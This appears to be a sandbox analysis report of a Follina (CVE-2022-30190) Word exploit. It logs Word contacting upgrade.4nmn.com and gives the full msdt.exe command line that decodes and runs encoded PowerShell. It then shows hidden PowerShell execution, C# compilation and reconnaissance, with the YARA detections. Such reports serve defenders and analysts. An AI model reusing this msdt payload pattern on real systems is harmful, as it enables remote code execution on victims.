X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: upgrade.4nmn.com

Timestamp: 2022-06-20 06:29:52 UTC | kBytes transferred: 0 | Direction: IN
HTTP/1.1 200 OK
Content-Length: 7402
Content-Type: text/html
Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
Accept-Ranges: bytes
ETag: "b0474a7ada82d81:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2022 06:29:52 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49752 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:29:58 UTC | kBytes transferred: 12 | Direction: OUT
HEAD /microsoft.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: upgrade.4nmn.com
Connection: Keep-Alive

Timestamp: 2022-06-20 06:29:58 UTC | kBytes transferred: 12 | Direction: IN
HTTP/1.1 200 OK
Content-Length: 7402
Content-Type: text/html
Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
Accept-Ranges: bytes
ETag: "b0474a7ada82d81:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2022 06:29:58 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49753 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:30:02 UTC | kBytes transferred: 12 | Direction: OUT
HEAD /microsoft.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: upgrade.4nmn.com
Connection: Keep-Alive

Timestamp: 2022-06-20 06:30:02 UTC | kBytes transferred: 12 | Direction: IN
HTTP/1.1 200 OK
Content-Length: 7402
Content-Type: text/html
Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
Accept-Ranges: bytes
ETag: "b0474a7ada82d81:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2022 06:30:02 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49744 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:29:55 UTC | kBytes transferred: 0 | Direction: OUT
OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: upgrade.4nmn.com

Timestamp: 2022-06-20 06:29:55 UTC | kBytes transferred: 1 | Direction: IN
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/10.0
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2022 06:29:55 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49745 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:29:56 UTC | kBytes transferred: 1 | Direction: OUT
GET /microsoft.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: upgrade.4nmn.com
Connection: Keep-Alive

Timestamp: 2022-06-20 06:29:56 UTC | kBytes transferred: 1 | Direction: IN
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
Accept-Ranges: bytes
ETag: "b0474a7ada82d81:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2022 06:29:55 GMT
Connection: close
Content-Length: 7402
Timestamp: 2022-06-20 06:29:56 UTC | kBytes transferred: 1 | Direction: IN
Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49746 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:29:57 UTC | kBytes transferred: 9 | Direction: OUT
Data:
HEAD /microsoft.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: upgrade.4nmn.com
Connection: Keep-Alive

Timestamp: 2022-06-20 06:29:57 UTC | kBytes transferred: 9 | Direction: IN
Data:
HTTP/1.1 200 OK
Content-Length: 7402
Content-Type: text/html
Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
Accept-Ranges: bytes
ETag: "b0474a7ada82d81:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2022 06:29:57 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49747 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:29:57 UTC | kBytes transferred: 9 | Direction: OUT
Data:
HEAD /microsoft.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: upgrade.4nmn.com
Connection: Keep-Alive

Timestamp: 2022-06-20 06:29:57 UTC | kBytes transferred: 9 | Direction: IN
Data:
HTTP/1.1 200 OK
Content-Length: 7402
Content-Type: text/html
Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
Accept-Ranges: bytes
ETag: "b0474a7ada82d81:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2022 06:29:57 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49748 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:29:57 UTC | kBytes transferred: 10 | Direction: OUT
Data:
OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: upgrade.4nmn.com

Timestamp: 2022-06-20 06:29:57 UTC | kBytes transferred: 10 | Direction: IN
Data:
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/10.0
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2022 06:29:57 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.3 | 49749 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:29:58 UTC | kBytes transferred: 10 | Direction: OUT
Data:
HEAD /microsoft.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: upgrade.4nmn.com

Timestamp: 2022-06-20 06:29:58 UTC | kBytes transferred: 10 | Direction: IN
Data:
HTTP/1.1 200 OK
Content-Length: 7402
Content-Type: text/html
Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
Accept-Ranges: bytes
ETag: "b0474a7ada82d81:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2022 06:29:57 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49750 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:29:58 UTC | kBytes transferred: 11 | Direction: OUT
Data:
GET /microsoft.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: upgrade.4nmn.com
If-Modified-Since: Sat, 18 Jun 2022 06:13:07 GMT
If-None-Match: "b0474a7ada82d81:0"
Connection: Keep-Alive

Timestamp: 2022-06-20 06:29:58 UTC | kBytes transferred: 11 | Direction: IN
Data:
HTTP/1.1 304 Not Modified
Date: Mon, 20 Jun 2022 06:29:57 GMT
Etag: "b0474a7ada82d81:0"
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49751 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:29:58 UTC | kBytes transferred: 11 | Direction: OUT
Data:
HEAD /microsoft.html HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: upgrade.4nmn.com
Connection: Keep-Alive

Timestamp: 2022-06-20 06:29:58 UTC | kBytes transferred: 11 | Direction: IN
Data:
HTTP/1.1 200 OK
Content-Length: 7402
Content-Type: text/html
Last-Modified: Sat, 18 Jun 2022 06:13:07 GMT
Accept-Ranges: bytes
ETag: "b0474a7ada82d81:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2022 06:29:57 GMT
Connection: close


Target ID: 0
Start time: 08:29:46
Start date: 20/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x380000
File size: 1937688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 1
Start time: 08:29:51
Start date: 20/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase: 0x1190000
File size: 466688 bytes
MD5 hash: EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 7
Start time: 08:30:00
Start date: 20/06/2022
Path: C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Imagebase: 0x1160000
File size: 1508352 bytes
MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000007.00000002.527146475.0000000000810000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000007.00000002.530154315.0000000000930000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000007.00000002.527356593.0000000000818000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000007.00000002.527356593.0000000000818000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000007.00000002.530232079.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000007.00000002.530232079.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate

                                                                                                                                                                Target ID:20
                                                                                                                                                                Start time:08:30:28
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.cmdline
                                                                                                                                                                Imagebase:0xc0000
                                                                                                                                                                File size:2170976 bytes
                                                                                                                                                                MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Target ID:21
                                                                                                                                                                Start time:08:30:30
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD7B.tmp" "c:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP"
                                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                                File size:43176 bytes
                                                                                                                                                                MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Target ID:22
                                                                                                                                                                Start time:08:30:33
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\53i2jeo5\53i2jeo5.cmdline
                                                                                                                                                                Imagebase:0xc0000
                                                                                                                                                                File size:2170976 bytes
                                                                                                                                                                MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Target ID:23
                                                                                                                                                                Start time:08:30:35
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC028.tmp" "c:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP"
                                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                                File size:43176 bytes
                                                                                                                                                                MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Target ID:25
                                                                                                                                                                Start time:08:30:50
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Unrestricted -File C:/Windows/Temp/5db65c7.ps1
                                                                                                                                                                Imagebase:0xb00000
                                                                                                                                                                File size:430592 bytes
                                                                                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Recon_Commands_Windows_Gen1, Description: Detects a set of reconnaissance commands on Windows systems, Source: 00000019.00000003.452130269.0000000003572000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                Reputation:high

                                                                                                                                                                Target ID:26
                                                                                                                                                                Start time:08:30:50
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7c9170000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Target ID:27
                                                                                                                                                                Start time:08:30:51
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\05d3mwhu\05d3mwhu.cmdline
                                                                                                                                                                Imagebase:0xc0000
                                                                                                                                                                File size:2170976 bytes
                                                                                                                                                                MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Target ID:28
                                                                                                                                                                Start time:08:30:53
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES753.tmp" "c:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP"
                                                                                                                                                                Imagebase:0x1f0000
                                                                                                                                                                File size:43176 bytes
                                                                                                                                                                MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Target ID:42
                                                                                                                                                                Start time:08:32:01
                                                                                                                                                                Start date:20/06/2022
                                                                                                                                                                Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\system32\ipconfig.exe" /all
                                                                                                                                                                Imagebase:0xb10000
                                                                                                                                                                File size:29184 bytes
                                                                                                                                                                MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                No disassembly